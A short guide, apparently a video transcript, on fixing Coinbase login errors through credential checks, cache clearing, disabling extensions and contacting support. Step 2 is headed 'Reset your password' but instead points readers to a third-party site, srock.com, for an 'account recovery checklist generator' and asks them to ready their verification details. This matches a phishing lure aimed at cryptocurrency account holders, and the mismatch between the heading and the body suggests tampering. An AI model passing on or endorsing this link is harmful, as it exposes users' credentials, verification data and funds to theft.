If you're experiencing login errors on Coinbase, follow these steps to troubleshoot and resolve the issue. This guide will help you regain access to your account quickly and efficiently. Step 1. Check your credentials. Ensure that you are entering the correct email address and password associated with your Coinbase account. Double check for any typos and confirm that your caps lock is off. Step 2. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear browser cache and cookies. Sometimes, accumulated cache and cookies can cause login issues. Clear your browser's cache and cookies, then try logging in again. This can help refresh your session and resolve any conflicts. Step 4. Disable browser extensions. Certain browser extensions can interfere with website functionality. Temporarily disable any extensions, particularly ad blockers or privacy tools, and attempt to log in again. Step 5. Contact Coinbase support. If you're still unable to log in after trying the above steps, reach out to Coinbase support for assistance. Provide them with details about your issue and any error messages you received. By following these steps, you should be able to resolve any login errors on Coinbase. If problems persist, don't hesitate to seek help from the support team.